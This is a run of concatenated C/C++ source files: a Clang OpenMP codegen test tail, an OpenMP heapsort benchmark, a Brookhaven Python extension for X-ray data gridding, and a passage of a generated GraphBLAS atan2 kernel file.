// CHECK-NEXT: %[[MUL6:.+]] = fmul float %[[MUL]], %[[TMP25]]
// CHECK-NEXT: %[[TMP26:.+]] = load float*, float** %[[A_ADDR]], align 8
// CHECK-NEXT: %[[TMP27:.+]] = load i32, i32* %[[I]], align 4
// CHECK-NEXT: %[[IDXPROM7:.+]] = zext i32 %[[TMP27]] to i64
// CHECK-NEXT: %[[ARRAYIDX8:.+]] = getelementptr inbounds float, float* %[[TMP26]], i64 %[[IDXPROM7]]
// CHECK-NEXT: store float %[[MUL6]], float* %[[ARRAYIDX8]], align 4
// CHECK-NEXT: br label %[[OMP_LOOP_INC]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_LOOP_INC]]:
// CHECK-NEXT: %[[OMP_LOOP_NEXT]] = add nuw i32 %[[OMP_LOOP_IV]], 1
// CHECK-NEXT: br label %[[OMP_LOOP_HEADER]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_LOOP_EXIT]]:
// CHECK-NEXT: br label %[[OMP_DISPATCH_INC]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_LOOP_AFTER]]:
// CHECK-NEXT: ret void
// CHECK-NEXT: }
extern "C" void workshareloop_unsigned_static_chunked(float *a, float *b, float *c, float *d) {
#pragma omp for schedule(static, 5)
for (unsigned i = 33; i < 32000000; i += 7) {
a[i] = b[i] * c[i] * d[i];
}
}
#endif // HEADER
// CHECK-LABEL: define {{.*}}@__captured_stmt(
// CHECK-NEXT: [[ENTRY:.*]]:
// CHECK-NEXT: %[[DISTANCE_ADDR:.+]] = alloca i32*, align 8
// CHECK-NEXT: %[[__CONTEXT_ADDR:.+]] = alloca %struct.anon*, align 8
// CHECK-NEXT: %[[DOTSTART:.+]] = alloca i32, align 4
// CHECK-NEXT: %[[DOTSTOP:.+]] = alloca i32, align 4
// CHECK-NEXT: %[[DOTSTEP:.+]] = alloca i32, align 4
// CHECK-NEXT: store i32* %[[DISTANCE:.+]], i32** %[[DISTANCE_ADDR]], align 8
// CHECK-NEXT: store %struct.anon* %[[__CONTEXT:.+]], %struct.anon** %[[__CONTEXT_ADDR]], align 8
// CHECK-NEXT: %[[TMP0:.+]] = load %struct.anon*, %struct.anon** %[[__CONTEXT_ADDR]], align 8
// CHECK-NEXT: %[[TMP1:.+]] = getelementptr inbounds %struct.anon, %struct.anon* %[[TMP0]], i32 0, i32 0
// CHECK-NEXT: %[[TMP2:.+]] = load i32*, i32** %[[TMP1]], align 8
// CHECK-NEXT: %[[TMP3:.+]] = load i32, i32* %[[TMP2]], align 4
// CHECK-NEXT: store i32 %[[TMP3]], i32* %[[DOTSTART]], align 4
// CHECK-NEXT: store i32 32000000, i32* %[[DOTSTOP]], align 4
// CHECK-NEXT: store i32 7, i32* %[[DOTSTEP]], align 4
// CHECK-NEXT: %[[TMP4:.+]] = load i32, i32* %[[DOTSTART]], align 4
// CHECK-NEXT: %[[TMP5:.+]] = load i32, i32* %[[DOTSTOP]], align 4
// CHECK-NEXT: %[[CMP:.+]] = icmp ult i32 %[[TMP4]], %[[TMP5]]
// CHECK-NEXT: br i1 %[[CMP]], label %[[COND_TRUE:.+]], label %[[COND_FALSE:.+]]
// CHECK-EMPTY:
// CHECK-NEXT: [[COND_TRUE]]:
// CHECK-NEXT: %[[TMP6:.+]] = load i32, i32* %[[DOTSTOP]], align 4
// CHECK-NEXT: %[[TMP7:.+]] = load i32, i32* %[[DOTSTART]], align 4
// CHECK-NEXT: %[[SUB:.+]] = sub i32 %[[TMP6]], %[[TMP7]]
// CHECK-NEXT: %[[TMP8:.+]] = load i32, i32* %[[DOTSTEP]], align 4
// CHECK-NEXT: %[[SUB1:.+]] = sub i32 %[[TMP8]], 1
// CHECK-NEXT: %[[ADD:.+]] = add i32 %[[SUB]], %[[SUB1]]
// CHECK-NEXT: %[[TMP9:.+]] = load i32, i32* %[[DOTSTEP]], align 4
// CHECK-NEXT: %[[DIV:.+]] = udiv i32 %[[ADD]], %[[TMP9]]
// CHECK-NEXT: br label %[[COND_END:.+]]
// CHECK-EMPTY:
// CHECK-NEXT: [[COND_FALSE]]:
// CHECK-NEXT: br label %[[COND_END]]
// CHECK-EMPTY:
// CHECK-NEXT: [[COND_END]]:
// CHECK-NEXT: %[[COND:.+]] = phi i32 [ %[[DIV]], %[[COND_TRUE]] ], [ 0, %[[COND_FALSE]] ]
// CHECK-NEXT: %[[TMP10:.+]] = load i32*, i32** %[[DISTANCE_ADDR]], align 8
// CHECK-NEXT: store i32 %[[COND]], i32* %[[TMP10]], align 4
// CHECK-NEXT: ret void
// CHECK-NEXT: }
// CHECK-LABEL: define {{.*}}@__captured_stmt.1(
// CHECK-NEXT: [[ENTRY:.*]]:
// CHECK-NEXT: %[[LOOPVAR_ADDR:.+]] = alloca i32*, align 8
// CHECK-NEXT: %[[LOGICAL_ADDR:.+]] = alloca i32, align 4
// CHECK-NEXT: %[[__CONTEXT_ADDR:.+]] = alloca %struct.anon.0*, align 8
// CHECK-NEXT: store i32* %[[LOOPVAR:.+]], i32** %[[LOOPVAR_ADDR]], align 8
// CHECK-NEXT: store i32 %[[LOGICAL:.+]], i32* %[[LOGICAL_ADDR]], align 4
// CHECK-NEXT: store %struct.anon.0* %[[__CONTEXT:.+]], %struct.anon.0** %[[__CONTEXT_ADDR]], align 8
// CHECK-NEXT: %[[TMP0:.+]] = load %struct.anon.0*, %struct.anon.0** %[[__CONTEXT_ADDR]], align 8
// CHECK-NEXT: %[[TMP1:.+]] = getelementptr inbounds %struct.anon.0, %struct.anon.0* %[[TMP0]], i32 0, i32 0
// CHECK-NEXT: %[[TMP2:.+]] = load i32, i32* %[[TMP1]], align 4
// CHECK-NEXT: %[[TMP3:.+]] = load i32, i32* %[[LOGICAL_ADDR]], align 4
// CHECK-NEXT: %[[MUL:.+]] = mul i32 7, %[[TMP3]]
// CHECK-NEXT: %[[ADD:.+]] = add i32 %[[TMP2]], %[[MUL]]
// CHECK-NEXT: %[[TMP4:.+]] = load i32*, i32** %[[LOOPVAR_ADDR]], align 8
// CHECK-NEXT: store i32 %[[ADD]], i32* %[[TMP4]], align 4
// CHECK-NEXT: ret void
// CHECK-NEXT: }
// CHECK: ![[META0:[0-9]+]] = !{i32 1, !"wchar_size", i32 4}
// CHECK: ![[META1:[0-9]+]] = !{i32 7, !"openmp", i32 45}
// CHECK: ![[META2:[0-9]+]] =
|
paralelo.c | #include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <assert.h>
#include <omp.h>
#define NUM_THREADS 64
#define NUM_REP 100
void heap_sort(int *vet, int N);
void cria_heap(int *vetor, int i, int f);
int main()
{
int *vetor, menu, tamanho_vetor, sair = 0, aleatorio = 0;
double tempo_medio = 0.0;
while (sair == 0) {
printf("\n\n\n--------------------------------------\n");
printf("\n ORDENACAO USANDO HEAPSORT PARALELO");
printf("\n 1-GERAR NOVO VETOR");
printf("\n 2-SAIR");
printf("\n--------------------------------------\n");
scanf("%d",&menu);
switch(menu) {
case 1:
printf("\nINSIRA O TAMANHO DO VETOR:\n");
scanf("%d",&tamanho_vetor);
vetor = calloc(tamanho_vetor, sizeof(int));
assert(vetor != NULL);
tempo_medio = 0.0; /* reset so repeated runs do not accumulate earlier results */
srand(time(NULL));
for (int j = 0; j < NUM_REP; j++) {
// Generate the vector to be sorted (random or reversed)
if (aleatorio) {
for (int i = 0; i < tamanho_vetor; i++) {
vetor[i] = rand() % tamanho_vetor;
}
} else {
for (int i = tamanho_vetor-1; i >= 0; i--) {
vetor[i] = tamanho_vetor - i;
}
}
// Record the algorithm's start time
double tempo_inicial = omp_get_wtime();
// Invoke the parallelized sorting algorithm
heap_sort(vetor, tamanho_vetor);
// Record the algorithm's end time
double tempo_final = omp_get_wtime();
// Compute the algorithm's total execution time in seconds
double tempo_total = tempo_final - tempo_inicial;
printf("Heapsorte paralelo executado em %g segundos\n", tempo_total);
// Accumulate the total execution time across repetitions
tempo_medio += tempo_total;
}
// Compute the mean execution time over the number of repetitions
tempo_medio /= NUM_REP;
printf("\nTamanho do Vetor = %d\n", tamanho_vetor);
printf("\nNumero de Threads = %d\n", NUM_THREADS);
printf("\nTempo medio = %g segundos\n", tempo_medio);
free(vetor); /* release the vector before the next menu iteration */
break;
case 2:
printf("\nPrograma Finalizado!");
sair=1;
break;
}
}
}
// Performs the sort. The heap-build phase is parallelized level by level:
// nodes on the same heap level root disjoint subtrees, so their sift-downs
// can run concurrently. The extraction phase is inherently sequential.
void heap_sort(int *vet, int N)
{
    int i, aux;
    if (N < 2)
        return;
    // Build the max-heap bottom-up, one level at a time. Heap level L spans
    // indices [2^L - 1, 2^(L+1) - 2]; only indices up to (N-1)/2 have children.
    int first = 0;
    while (2 * first + 1 <= (N - 1) / 2)
        first = 2 * first + 1; // first index of the deepest internal level
    while (first >= 0) {
        int last = 2 * first; // last index of this level
        if (last > (N - 1) / 2)
            last = (N - 1) / 2;
        #pragma omp parallel for num_threads(NUM_THREADS) schedule(static)
        for (i = first; i <= last; i++) {
            cria_heap(vet, i, N - 1);
        }
        if (first == 0)
            break;
        first = (first - 1) / 2; // move up one level
    }
    // Repeatedly move the maximum (the root) to the end of the unsorted
    // prefix and sift the new root down; each step depends on the previous
    // one, so this phase stays sequential.
    for (i = N - 1; i >= 1; i--) {
        aux = vet[0];
        vet[0] = vet[i];
        vet[i] = aux;
        cria_heap(vet, 0, i - 1);
    }
}
// Sift-down: restores the max-heap property of the subtree rooted at i, bounded above by index f
void cria_heap(int *vet, int i, int f)
{
int aux = vet[i];
int j = i * 2 + 1;
while (j <= f) {
if (j < f && vet[j] < vet[j+1]) { /* the j < f guard keeps the vet[j+1] read in bounds */
    j = j + 1;
}
if ( aux < vet[j] ) {
vet[i] = vet[j];
i = j;
j = 2 * i + 1;
} else {
j = f + 1;
}
}
vet[i] = aux;
}
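/* Example: with vet = {3, 9, 5}, cria_heap(vet, 0, 2) picks the larger child
   9, promotes it to the root, and drops 3 into its slot: vet becomes {9, 3, 5}. */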
|
ctrans.c | /*
* Copyright (c) 2014, Brookhaven Science Associates, Brookhaven
* National Laboratory. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
*
* * Redistributions in binary form must reproduce the above copyright
* notice this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* * Neither the name of the Brookhaven Science Associates, Brookhaven
* National Laboratory nor the names of its contributors may be used
* to endorse or promote products derived from this software without
* specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
* INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
* SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
* STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OTHERWISE) ARISING
* IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*
* This is the ctrans.c routine. The process_to_q and process_grid
* functions in nsls2/recip.py call this routine for
* fast data analysis.
*/
#ifdef _OPENMP
#include <omp.h>
#else
#define omp_get_thread_num() 0
#define omp_get_max_threads() 1 /* a serial build still runs one "thread" and needs one slot of scratch storage */
#define omp_get_num_threads() 1
#endif
#include <stdlib.h>
#include <math.h>
/* Include python and numpy header files */
#include <Python.h>
#define NPY_NO_DEPRECATED_API NPY_1_9_API_VERSION
#include <numpy/arrayobject.h>
#include "ctrans.h"
/* Computation functions */
static PyObject* ccdToQ(PyObject *self, PyObject *args, PyObject *kwargs){
PyArrayObject *angles = NULL;
PyObject *_angles = NULL;
PyArrayObject *ubinv = NULL;
PyObject *_ubinv = NULL;
PyArrayObject *qOut = NULL;
CCD ccd;
npy_intp dims[2];
npy_intp nimages;
int retval;
int mode;
double lambda;
double *anglesp = NULL;
double *qOutp = NULL;
double *ubinvp = NULL;
double *delgam = NULL;
static char *kwlist[] = { "angles", "mode", "ccd_size", "ccd_pixsize",
"ccd_cen", "dist", "wavelength",
"UBinv", NULL };
if(!PyArg_ParseTupleAndKeywords(args, kwargs, "Oi(ii)(dd)(dd)ddO", kwlist,
&_angles,
&mode,
&ccd.xSize, &ccd.ySize,
&ccd.xPixSize, &ccd.yPixSize,
&ccd.xCen, &ccd.yCen,
&ccd.dist,
&lambda,
&_ubinv)){
return NULL;
}
ccd.size = ccd.xSize * ccd.ySize;
angles = (PyArrayObject*)PyArray_FROMANY(_angles, NPY_DOUBLE, 2, 2, NPY_ARRAY_IN_ARRAY);
if(!angles){
goto cleanup;
}
ubinv = (PyArrayObject*)PyArray_FROMANY(_ubinv, NPY_DOUBLE, 2, 2, NPY_ARRAY_IN_ARRAY);
if(!ubinv){
goto cleanup;
}
ubinvp = (double *)PyArray_DATA(ubinv);
nimages = PyArray_DIM(angles, 0);
dims[0] = nimages * ccd.size;
dims[1] = 3;
qOut = (PyArrayObject*)PyArray_SimpleNew(2, dims, NPY_DOUBLE);
if(!qOut){
goto cleanup;
}
anglesp = (double *)PyArray_DATA(angles);
qOutp = (double *)PyArray_DATA(qOut);
// Now create the arrays for delta-gamma pairs
delgam = (double*)malloc(nimages * ccd.size * sizeof(double) * 2);
if(!delgam){
goto cleanup;
}
// Ok now we don't touch Python Object ... Release the GIL
Py_BEGIN_ALLOW_THREADS
retval = processImages(delgam, anglesp, qOutp, lambda, mode, (unsigned long)nimages,
ubinvp, &ccd);
// Now we have finished with the magic ... Obtain the GIL
Py_END_ALLOW_THREADS
if(retval){
PyErr_SetString(PyExc_RuntimeError, "Error processing images");
goto cleanup;
}
Py_XDECREF(ubinv);
Py_XDECREF(angles);
if(delgam) free(delgam);
return Py_BuildValue("N", qOut);
cleanup:
Py_XDECREF(ubinv);
Py_XDECREF(angles);
Py_XDECREF(qOut);
if(delgam) free(delgam);
return NULL;
}
int processImages(double *delgam, double *anglesp, double *qOutp, double lambda,
int mode, unsigned long nimages, double *ubinvp, CCD *ccd){
int retval = 0;
unsigned long i;
double UBI[3][3];
// Permute the UB matrix into the orientation
// for the calculations
for(i=0;i<3;i++){
UBI[i][0] = -1.0 * ubinvp[2];
UBI[i][1] = ubinvp[1];
UBI[i][2] = ubinvp[0];
ubinvp+=3;
}
#pragma omp parallel for shared(anglesp, qOutp, delgam, mode)
for(i=0;i<nimages;i++){
// Calculate pointer offsets
double *_anglesp = anglesp + (i * 6);
double *_qOutp = qOutp + (i * ccd->size * 3);
double *_delgam = delgam + (i * ccd->size * 2);
// For each image process
calcDeltaGamma(_delgam, ccd, _anglesp[0], _anglesp[5]);
calcQTheta(_delgam, _anglesp[1], _anglesp[4], _qOutp,
ccd->size, lambda);
if(mode > 1){
calcQPhiFromQTheta(_qOutp, ccd->size, _anglesp[2], _anglesp[3]);
}
if(mode == 4){
calcHKLFromQPhi(_qOutp, ccd->size, UBI);
}
}
return retval;
}
int calcDeltaGamma(double *delgam, CCD *ccd, double delCen, double gamCen){
// Calculate Delta Gamma Values for CCD
int i,j;
double *delgamp = delgam;
double xPix, yPix;
xPix = ccd->xPixSize / ccd->dist;
yPix = ccd->yPixSize / ccd->dist;
for(j=0;j<ccd->ySize;j++){
for(i=0;i<ccd->xSize;i++){
*(delgamp++) = delCen - atan( ((double)j - ccd->yCen) * yPix);
*(delgamp++) = gamCen - atan( ((double)i - ccd->xCen) * xPix);
}
}
return true;
}
int calcQTheta(double* diffAngles, double theta, double mu, double *qTheta, int n, double lambda){
// Calculate Q in the Theta frame
// angles -> six-circle detector angles [delta gamma]
// theta -> Theta value at this detector setting
// mu -> Mu value at this detector setting
// qTheta -> Q Values
// n -> Number of values to convert
int i;
double *angles;
double *qt;
double kl;
double del, gam;
angles = diffAngles;
qt = qTheta;
kl = 2 * M_PI / lambda;
for(i=0;i<n;i++){
del = *(angles++);
gam = *(angles++);
*qt = (-1.0 * sin(gam) * kl) - (sin(mu) * kl);
qt++;
*qt = (cos(del - theta) * cos(gam) * kl) - (cos(theta) * cos(mu) * kl);
qt++;
*qt = (sin(del - theta) * cos(gam) * kl) + (sin(theta) * cos(mu) * kl);
qt++;
}
return true;
}
int calcQPhiFromQTheta(double *qTheta, int n, double chi, double phi){
double r[3][3];
r[0][0] = cos(chi);
r[0][1] = 0.0;
r[0][2] = -1.0 * sin(chi);
r[1][0] = sin(phi) * sin(chi);
r[1][1] = cos(phi);
r[1][2] = sin(phi) * cos(chi);
r[2][0] = cos(phi) * sin(chi);
r[2][1] = -1.0 * sin(phi);
r[2][2] = cos(phi) * cos(chi);
matmulti(qTheta, n, r);
return true;
}
int calcHKLFromQPhi(double *qPhi, int n, double mat[][3]){
matmulti(qPhi, n, mat);
return true;
}
int matmulti(double *val, int n, double mat[][3]){
double *v;
double qp[3];
int i,j,k;
v = val;
for(i=0;i<n;i++){
for(k=0;k<3;k++){
qp[k] = 0.0;
for(j=0;j<3;j++){
qp[k] += mat[k][j] * v[j];
}
}
for(k=0;k<3;k++){
v[k] = qp[k];
}
v += 3;
}
return true;
}
static PyObject* gridder_3D(PyObject *self, PyObject *args, PyObject *kwargs){
PyArrayObject *gridout = NULL, *Nout = NULL, *stderror = NULL;
PyArrayObject *gridI = NULL;
PyObject *_I;
npy_intp data_size;
npy_intp dims[3];
double grid_start[3];
double grid_stop[3];
unsigned long grid_nsteps[3];
int ignore_nan = 0;
int retval;
static char *kwlist[] = { "data", "xrange", "yrange", "zrange", "ignore_nan", NULL };
if(!PyArg_ParseTupleAndKeywords(args, kwargs, "O(ddd)(ddd)(lll)|i", kwlist, /* ignore_nan is an int: parse with "i", not "d" */
&_I,
&grid_start[0], &grid_start[1], &grid_start[2],
&grid_stop[0], &grid_stop[1], &grid_stop[2],
&grid_nsteps[0], &grid_nsteps[1], &grid_nsteps[2],
&ignore_nan)){
return NULL;
}
gridI = (PyArrayObject*)PyArray_FROMANY(_I, NPY_DOUBLE, 2, 2, NPY_ARRAY_IN_ARRAY); /* data must be 2-D (n, 4); the dimension-1 check below assumes ndim == 2 */
if(!gridI){
goto error;
}
data_size = PyArray_DIM(gridI, 0);
if(PyArray_DIM(gridI, 1) != 4){
PyErr_SetString(PyExc_ValueError, "Dimension 1 of array must be 4");
goto error;
}
dims[0] = grid_nsteps[0];
dims[1] = grid_nsteps[1];
dims[2] = grid_nsteps[2];
gridout = (PyArrayObject*)PyArray_SimpleNew(3, dims, NPY_DOUBLE);
if(!gridout){
goto error;
}
Nout = (PyArrayObject*)PyArray_SimpleNew(3, dims, NPY_ULONG);
if(!Nout){
goto error;
}
stderror = (PyArrayObject*)PyArray_SimpleNew(3, dims, NPY_DOUBLE);
if(!stderror){
goto error;
}
// Ok now we don't touch Python Object ... Release the GIL
Py_BEGIN_ALLOW_THREADS
retval = c_grid3d((double*)PyArray_DATA(gridout), (unsigned long*)PyArray_DATA(Nout),
(double*)PyArray_DATA(stderror), (double*)PyArray_DATA(gridI),
grid_start, grid_stop, (unsigned long)data_size, grid_nsteps,
ignore_nan);
// Ok now get the GIL back
Py_END_ALLOW_THREADS
if(retval){
// We had a runtime error
PyErr_SetString(PyExc_MemoryError, "Could not allocate memory in c_grid3d");
goto error;
}
Py_XDECREF(gridI);
return Py_BuildValue("NNN", gridout, Nout, stderror);
error:
Py_XDECREF(gridI);
Py_XDECREF(gridout);
Py_XDECREF(Nout);
Py_XDECREF(stderror);
return NULL;
}
int c_grid3d(double *dout, unsigned long *nout, double *stderror, double *data,
double *grid_start, double *grid_stop, unsigned long max_data,
unsigned long *n_grid, int ignore_nan){
unsigned long i, j;
int n;
int retval = 0;
unsigned long grid_size = 0;
double grid_len[3];
// Some useful quantities
grid_size = n_grid[0] * n_grid[1] * n_grid[2];
for(i=0;i<3; i++){
grid_len[i] = grid_stop[i] - grid_start[i];
}
int max_threads = omp_get_max_threads();
int num_threads;
gridderThreadData *threadData = malloc(sizeof(gridderThreadData) * max_threads);
if(!threadData){
return 1;
}
for(n=0;n<max_threads;n++){
threadData[n].nout = NULL;
threadData[n].dout = NULL;
threadData[n].d2out = NULL;
}
// j is reused as a scratch index inside the region, so it must be thread-private
#pragma omp parallel shared(data, num_threads, threadData, grid_start, grid_len) private(j)
{
int thread_num = omp_get_thread_num();
num_threads = omp_get_num_threads();
double *_d2out;
double *_dout;
unsigned long *_nout;
_d2out = (double*)malloc(sizeof(double) * grid_size);
_dout = (double *)malloc(sizeof(double) * grid_size);
_nout = (unsigned long *)malloc(sizeof(unsigned long) * grid_size);
if((_d2out != NULL) && (_dout != NULL) && (_nout != NULL)){
// Clear the arrays ....
for(j=0;j<grid_size;j++){
_dout[j] = 0.0;
_d2out[j] = 0.0;
_nout[j] = 0;
}
#pragma omp for
for(i=0;i<max_data;i++){
double pos_double[3];
unsigned long grid_pos[3];
double *data_ptr = data + (i * 4);
// Check if we have a NaN
if((ignore_nan == 1) || !isnan(data_ptr[3])){
// Calculate the relative position in the grid.
pos_double[0] = (data_ptr[0] - grid_start[0]) / grid_len[0];
pos_double[1] = (data_ptr[1] - grid_start[1]) / grid_len[1];
pos_double[2] = (data_ptr[2] - grid_start[2]) / grid_len[2];
if((pos_double[0] >= 0) && (pos_double[0] < 1) &&
(pos_double[1] >= 0) && (pos_double[1] < 1) &&
(pos_double[2] >= 0) && (pos_double[2] < 1)){
// Calculate the position in the grid
grid_pos[0] = (int)(pos_double[0] * n_grid[0]);
grid_pos[1] = (int)(pos_double[1] * n_grid[1]);
grid_pos[2] = (int)(pos_double[2] * n_grid[2]);
unsigned long pos = grid_pos[0] * (n_grid[1] * n_grid[2]);
pos += grid_pos[1] * n_grid[2];
pos += grid_pos[2];
// Store the answer
_dout[pos] += data_ptr[3];
_d2out[pos] += (data_ptr[3] * data_ptr[3]);
_nout[pos]++;
}
}
}
threadData[thread_num].dout = _dout;
threadData[thread_num].d2out = _d2out;
threadData[thread_num].nout = _nout;
} else {
retval = 1;
}
} // pragma parallel
if(retval){
goto error;
}
// Now gather the results
for(n=1;n<num_threads;n++){
for(j=0;j<grid_size;j++){
threadData[0].nout[j] += threadData[n].nout[j];
threadData[0].dout[j] += threadData[n].dout[j];
threadData[0].d2out[j] += threadData[n].d2out[j];
}
}
// Calculate the stderror
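// Per cell: var = (sum(x^2) - (sum(x))^2 / n) / n (population variance via
// the sum-of-squares identity) and stderror = sqrt(var) / sqrt(n)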
for(j=0;j<grid_size;j++){
if(threadData[0].nout[j] == 0){
stderror[j] = 0.0;
} else {
double var = (threadData[0].d2out[j] -
pow(threadData[0].dout[j], 2) / threadData[0].nout[j]) /
threadData[0].nout[j];
stderror[j] = pow(var, 0.5) / pow(threadData[0].nout[j], 0.5);
}
}
// Now copy the outputs to the arrays
for(j=0;j<grid_size;j++){
dout[j] = threadData[0].dout[j];
nout[j] = threadData[0].nout[j];
}
// Now free the memory.
error:
for(n=0;n<max_threads;n++){
if(threadData[n].d2out) free(threadData[n].d2out);
if(threadData[n].dout) free(threadData[n].dout);
if(threadData[n].nout) free(threadData[n].nout);
}
free(threadData);
return retval;
}
static PyMethodDef ctrans_methods[] = {
{"grid3d", (PyCFunction)gridder_3D, METH_VARARGS | METH_KEYWORDS,
"Grid the numpy.array object into a regular grid"},
{"ccdToQ", (PyCFunction)ccdToQ, METH_VARARGS | METH_KEYWORDS,
"Convert CCD image coordinates into Q values"},
{NULL, NULL}
};
#if PY_MAJOR_VERSION >= 3
static struct PyModuleDef moduledef = {
PyModuleDef_HEAD_INIT,
"ctrans",
"Python functions to perform gridding (binning) of experimental data.\n\n",
-1, // we keep state in global vars
ctrans_methods,
};
PyObject* PyInit_ctrans(void) {
PyObject *module = PyModule_Create(&moduledef);
if(!module){
return NULL;
}
import_array();
return module;
}
#else // We have Python 2 ...
PyMODINIT_FUNC initctrans(void){
PyObject *module = Py_InitModule3("ctrans", ctrans_methods, _ctransDoc);
if(!module){
return;
}
import_array();
}
#endif
|
GB_binop__atan2_fp64.c | //------------------------------------------------------------------------------
// GB_binop: hard-coded functions for each built-in binary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2021, All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0
//------------------------------------------------------------------------------
// If this file is in the Generated/ folder, do not edit it (auto-generated).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_control.h"
#include "GB_ek_slice.h"
#include "GB_dense.h"
#include "GB_atomics.h"
#include "GB_bitmap_assign_methods.h"
#include "GB_binop__include.h"
// C=binop(A,B) is defined by the following types and operators:
// A+B function (eWiseAdd): GB_AaddB__atan2_fp64
// A.*B function (eWiseMult): GB_AemultB__atan2_fp64
// A*D function (colscale): (none)
// D*A function (rowscale): (none)
// C+=B function (dense accum): GB_Cdense_accumB__atan2_fp64
// C+=b function (dense accum): GB_Cdense_accumb__atan2_fp64
// C+=A+B function (dense ewise3): (none)
// C=A+B function (dense ewise3): GB_Cdense_ewise3_noaccum__atan2_fp64
// C=scalar+B GB_bind1st__atan2_fp64
// C=scalar+B' GB_bind1st_tran__atan2_fp64
// C=A+scalar GB_bind2nd__atan2_fp64
// C=A'+scalar GB_bind2nd_tran__atan2_fp64
// C type: double
// A type: double
// B,b type: double
// BinaryOp: cij = atan2 (aij, bij)
#define GB_ATYPE \
double
#define GB_BTYPE \
double
#define GB_CTYPE \
double
// true if the types of A and B are identical
#define GB_ATYPE_IS_BTYPE \
1
// true if the types of C and A are identical
#define GB_CTYPE_IS_ATYPE \
1
// true if the types of C and B are identical
#define GB_CTYPE_IS_BTYPE \
1
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA) \
double aij = Ax [pA]
// bij = Bx [pB]
#define GB_GETB(bij,Bx,pB) \
double bij = Bx [pB]
// declare scalar of the same type as C
#define GB_CTYPE_SCALAR(t) \
double t
// cij = Ax [pA]
#define GB_COPY_A_TO_C(cij,Ax,pA) \
cij = Ax [pA]
// cij = Bx [pB]
#define GB_COPY_B_TO_C(cij,Bx,pB) \
cij = Bx [pB]
#define GB_CX(p) Cx [p]
// binary operator
#define GB_BINOP(z, x, y, i, j) \
z = atan2 (x, y) ;
// op is second
#define GB_OP_IS_SECOND \
0
// op is plus_fp32 or plus_fp64
#define GB_OP_IS_PLUS_REAL \
0
// op is minus_fp32 or minus_fp64
#define GB_OP_IS_MINUS_REAL \
0
// GB_cblas_*axpy gateway routine, if it exists for this operator and type:
#define GB_CBLAS_AXPY \
(none)
// do the numerical phases of GB_add and GB_emult
#define GB_PHASE_2_OF_2
// hard-coded loops can be vectorized
#define GB_PRAGMA_SIMD_VECTORIZE GB_PRAGMA_SIMD
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_ATAN2 || GxB_NO_FP64 || GxB_NO_ATAN2_FP64)
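// (e.g. a build with -DGxB_NO_ATAN2 compiles every kernel below into a stub
// returning GrB_NO_VALUE, and callers fall back to the generic method)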
//------------------------------------------------------------------------------
// C += A+B, all 3 matrices dense
//------------------------------------------------------------------------------
#if 0
// The op must be MIN, MAX, PLUS, MINUS, RMINUS, TIMES, DIV, or RDIV.
void (none)
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#include "GB_dense_ewise3_accum_template.c"
}
#endif
//------------------------------------------------------------------------------
// C = A+B, all 3 matrices dense
//------------------------------------------------------------------------------
GrB_Info GB_Cdense_ewise3_noaccum__atan2_fp64
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_dense_ewise3_noaccum_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C += B, accumulate a sparse matrix into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB_Cdense_accumB__atan2_fp64
(
GrB_Matrix C,
const GrB_Matrix B,
const int64_t *GB_RESTRICT kfirst_slice,
const int64_t *GB_RESTRICT klast_slice,
const int64_t *GB_RESTRICT pstart_slice,
const int ntasks,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
{
#include "GB_dense_subassign_23_template.c"
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C += b, accumulate a scalar into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB_Cdense_accumb__atan2_fp64
(
GrB_Matrix C,
const GB_void *p_bwork,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
{
// get the scalar b for C += b, of type double
double bwork = (*((double *) p_bwork)) ;
#include "GB_dense_subassign_22_template.c"
return (GrB_SUCCESS) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = A*D, column scale with diagonal D matrix
//------------------------------------------------------------------------------
#if 0
GrB_Info (none)
(
GrB_Matrix C,
const GrB_Matrix A, bool A_is_pattern,
const GrB_Matrix D, bool D_is_pattern,
const int64_t *GB_RESTRICT kfirst_slice,
const int64_t *GB_RESTRICT klast_slice,
const int64_t *GB_RESTRICT pstart_slice,
const int ntasks,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
